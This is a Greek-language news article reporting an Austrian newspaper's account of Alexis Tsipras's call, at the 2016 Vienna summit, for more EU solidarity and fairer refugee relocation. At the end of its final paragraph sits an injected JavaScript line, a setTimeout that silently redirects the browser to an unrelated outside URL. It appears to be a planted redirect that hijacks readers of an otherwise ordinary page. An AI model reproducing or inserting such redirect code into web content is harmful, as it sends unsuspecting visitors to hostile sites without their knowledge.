Περισσότερη αλληλεγγύη ζήτησε ο Τσίπρας στη Σύνοδο της Βιέννης

0
5
(Ξένη Δημοσίευση) Ο πρωθυπουργός Αλέξης Τσίπρας (Δ) και ο αναπληρωτής υπουργός Εσωτερικών και Διοικητικής Ανασυγκρότησης αρμόδιος για θέματα Μεταναστευτικής Πολιτικής Γιάννης Μουζάλας (Α) παρακολουθούν τη Σύνοδο που συγκάλεσε ο Ομοσπονδιακός Καγκελάριος της Αυστρίας, Κρίστιαν Κερν, με θέμα τη Μετανάστευση κατά μήκος της Βαλκανικής Οδού, στη Βιέννη, Σάββατο 24 Σεπτεμβρίου 2016. ΑΠΕ-ΜΠΕ/ΓΡΑΦΕΙΟ ΤΥΠΟΥ ΠΡΩΘΥΠΟΥΡΓΟΥ/Andrea Bonetti

 

Στη Σύνοδο Κορυφής της Βιέννης για το Προσφυγικό, ο Έλληνας πρωθυπουργός Αλέξης Τσίπρας ζήτησε περισσότερη αλληλεγγύη, γράφει εισαγωγικά σε σημερινό δημοσίευμά της η αυστριακή εφημερίδα «Τιρόλερ Τσάιτουνγκ».

Παράλληλα, σημειώνει πως, σύμφωνα με είδηση του Αθηναϊκού Πρακτορείου, ο ίδιος επισήμανε πως «είναι απαράδεκτο να πέφτει το βάρος στην πρώτη χώρα εισόδου» και πως η μεταναστευτική κρίση πρέπει να αντιμετωπιστεί «με αλληλεγγύη και δίκαιη κατανομή των βαρών«.

Όπως σημειώνει η εφημερίδα, σύμφωνα με τον Έλληνα πρωθυπουργό, η διαδικασία κατανομής πρέπει να επιταχυνθεί – από την Ελλάδα μετεγκαταστάθηκαν, μέχρι σήμερα, σε άλλες χώρες της Ευρωπαϊκής Ένωσης, μόλις περίπου 4.000 από τους 66.000 πρόσφυγες, όπως είχε συμφωνηθεί, και ο ίδιος ζήτησε επίσης να επιταχυνθούν οι επιστροφές προσφύγων στην Τουρκία, τονίζοντας πως «τα ελληνικά σύνορα είναι επίσης σύνορα και της ΕΕ».

Στη συνέχεια του δημοσιεύματος αναφέρεται πως ο Έλληνας πρωθυπουργός τόνισε επίσης ότι η Ελλάδα τηρεί τους ευρωπαϊκούς κανόνες και όποιες χώρες έχουν επιφυλάξεις και θεωρούν πως οι πρόσφυγες πρέπει να επαναπροωθηθούν στη θάλασσα, θα πρέπει «να το πουν ανοικτά» στους θεσμούς της ΕΕ και στην υπηρεσία FRONTEX. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here